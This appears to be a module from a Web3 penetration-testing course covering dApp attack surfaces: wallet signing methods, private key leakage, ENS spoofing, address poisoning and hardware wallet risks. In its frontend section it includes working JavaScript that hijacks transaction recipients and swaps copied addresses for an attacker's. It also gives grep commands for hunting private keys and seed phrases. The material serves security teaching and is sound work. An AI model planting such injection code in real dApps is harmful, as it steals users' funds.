You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
"Decentralized" applications are rarely fully decentralized. Most dApps have centralized frontends, APIs, databases, and admin panels. This module covers the full Web2+Web3 attack surface of decentralized applications — from wallet interactions to backend API exploitation.
8.1 Web3 Wallet Interaction Security
MetaMask Security Considerations
Risk
Description
Exploitation
Unlimited token approvals
dApps request approve(MAX_UINT256) — if the dApp or its contract is compromised, all approved tokens are at risk
Revoke via revoke.cash
Blind signing
Users sign messages they can't read (raw hex)
Malicious dApps trick users into signing arbitrary data
eth_sign
Signs arbitrary hash — can sign transactions
Phishing dApps use eth_sign to sign a transfer tx
Phishing pop-ups
Fake MetaMask prompts on malicious sites
Cloned approval dialogs
WalletConnect Vulnerabilities
WalletConnect v2 uses the Relay protocol:
1. Session proposal → user approves connection
2. RPC requests → methods the dApp can call through the wallet
Attack vectors:
- Session hijacking (expired sessions still accepted)
- Man-in-the-middle on relay server
- Malicious dApp requesting dangerous methods (eth_sendTransaction to drainer)
Signing Method Comparison
Method
Safety
What It Signs
Use Case
personal_sign
[YES] Safer
Prefixed message (EIP-191)
Login, off-chain messaging
eth_signTypedData_v4
[YES] Safest
Structured data (EIP-712)
Permits, orders, meta-txs
eth_sign
[NO] Dangerous
Raw 32-byte hash
Legacy — can sign any tx
eth_signTransaction
! Risky
Full transaction object
Should only be used internally
8.2 Frontend Attack Vectors
Malicious dApp Injection
// Attacker injects this into a compromised dApp frontend:// Intercepts all transactions and redirects fundsconstoriginalSendTransaction=window.ethereum.request;window.ethereum.request=asyncfunction(args){if(args.method==='eth_sendTransaction'){// Redirect the 'to' address to attacker's walletargs.params[0].to='0xAttackerWallet';}returnoriginalSendTransaction.call(this,args);};
Clipboard Hijacking
// Monitor clipboard for crypto addresses and replace themdocument.addEventListener('copy',function(e){constselection=document.getSelection().toString();// If user copies an Ethereum address, replace with attacker'sif(/^0x[a-fA-F0-9]{40}$/.test(selection.trim())){e.clipboardData.setData('text/plain','0xATTACKER_ADDRESS');e.preventDefault();}});
If a dApp hardcodes a public RPC endpoint:
1. RPC provider can see all user transactions (privacy leak)
2. RPC can return manipulated data (fake balances, fake nonces)
3. RPCs can censor transactions (refuse to broadcast)
4. Free RPCs have rate limits → DoS vector for dApp
Defense: Users should use their own RPC, or dApp should rotate providers
8.4 Private Key Leakage
Common Leakage Vectors
Vector
How It Happens
Frequency
Frontend JavaScript
Private key hardcoded in client-side code
Common in amateur projects
.env in version control
.env file committed to public GitHub
Very common
Browser local storage
Wallet stores keys in localStorage (non-hardware wallets)
Medium
Server environment variables
Secret leaked via error pages, debug endpoints
Medium
CI/CD logs
Keys printed or logged during deployment
Common
Dependency exfiltration
Malicious npm package reads process.env
Event-stream incident
Detection in Pentests
# Search for private keys in frontend code
grep -rn "0x[a-fA-F0-9]\{64\}" src/ --include="*.js" --include="*.ts" --include="*.jsx"# Search for .env files in git history
git log --all --full-history -- "*.env"
git log --all --full-history -- ".env*"# Check for hardcoded mnemonics
grep -rn "candy maple\|abandon abandon\|test test\|knife multi" src/ --include="*.js"# Search for common private key variable names
grep -rn "PRIVATE_KEY\|DEPLOYER_KEY\|MNEMONIC\|SEED_PHRASE" src/ --include="*.js"
Common admin panel vulnerabilities in dApps:
1. Default credentials (admin/admin)
2. No MFA (2FA not required for admin access)
3. Exposed admin panel URL (often at /admin, /dashboard)
4. Admin can:
- Pause/unpause contracts
- Upgrade proxy implementations
- Modify protocol parameters
- Whitelist/blacklist addresses
5. Admin key stored in .env on a server → server compromise = protocol compromise
8.9 IPFS Content Injection
If a dApp stores content references on IPFS:
1. Content addressing = content is verified by hash
2. BUT: If the smart contract stores an HTTP URL (not IPFS CID), content can change
3. IPFS gateways can be compromised → serve wrong content
4. Metadata update attacks: If contract has setTokenURI(), owner changes metadata post-sale
Attack scenario for NFTs:
1. Mint NFT with attractive art stored on IPFS (pinned by creator)
2. Sell NFT at premium
3. Unpin the content → image disappears
4. Or: Update tokenURI to point to different content
8.10 ENS Spoofing & Homoglyph Attacks
ENS (Ethereum Name Service) Attack Vectors
Attack
Description
Homoglyph
Register unіswap.eth (Cyrillic 'і') vs uniswap.eth (Latin 'i')
Expired ENS
Previous owner's ENS name expires, attacker registers it → receives misdirected funds
Subdomain spoofing
legit.protocol.eth → legit-protocol.fake.eth
ENS record manipulation
If attacker gains control of ENS record, they can redirect resolution to their contract
How it works:
1. Victim regularly sends to 0xA1B2...9F00 (legitimate address)
2. Attacker generates an address with same first/last characters: 0xA1B2...9F00
(Different middle characters)
3. Attacker sends 0 tokens FROM the spoofed address TO the victim
4. Victim sees the spoofed address in transaction history
5. Victim copy-pastes the wrong address for next transfer → funds go to attacker
Defense: Always verify the FULL address, use address book/contacts
8.12 Browser Extension Security
Malicious Extensions
Attack vectors:
1. Fake wallet extensions (not from official MetaMask)
2. Extensions with "Access all website data" permissions
3. Extensions that inject JavaScript into dApp pages
4. Keyloggers disguised as browser extensions
What malicious extensions can do:
- Read seed phrases from wallet UI
- Intercept transaction signing
- Modify displayed transaction details
- Redirect tokens/ETH to attacker addresses
- Read clipboard (address replacement)
8.13 Hardware Wallet Attack Surface
Physical Attack Vectors
Attack
Complexity
Description
Supply chain
High
Tampered hardware wallet shipped pre-compromised
Side channels
Very High
Power analysis, electromagnetic emanation during signing
Fault injection
Very High
Voltage glitching to bypass PIN protection
Firmware update
Medium
Malicious firmware update disguised as legitimate
Social engineering
Low
"Enter your seed phrase to update firmware" phishing
Evil maid
Medium
Physical access to unlock and extract keys
Software-Level Hardware Wallet Risks
Even with hardware wallets:
1. The transaction must still be verified on screen
2. If the hardware wallet's screen is compromised → displays wrong address
3. Blind signing on hardware wallets (signing without full tx display) is dangerous
4. Some hardware wallets don't fully decode EIP-712 typed data
Key Takeaway: Web3 security extends far beyond smart contracts. The biggest losses to end users come from phishing, approval exploits, and compromised frontends — not smart contract bugs. A comprehensive Web3 pentest must cover the entire stack: frontend, backend API, wallet integration, DNS, and social engineering vectors. Don't forget that most "decentralized" apps are actually centralized apps that interact with smart contracts.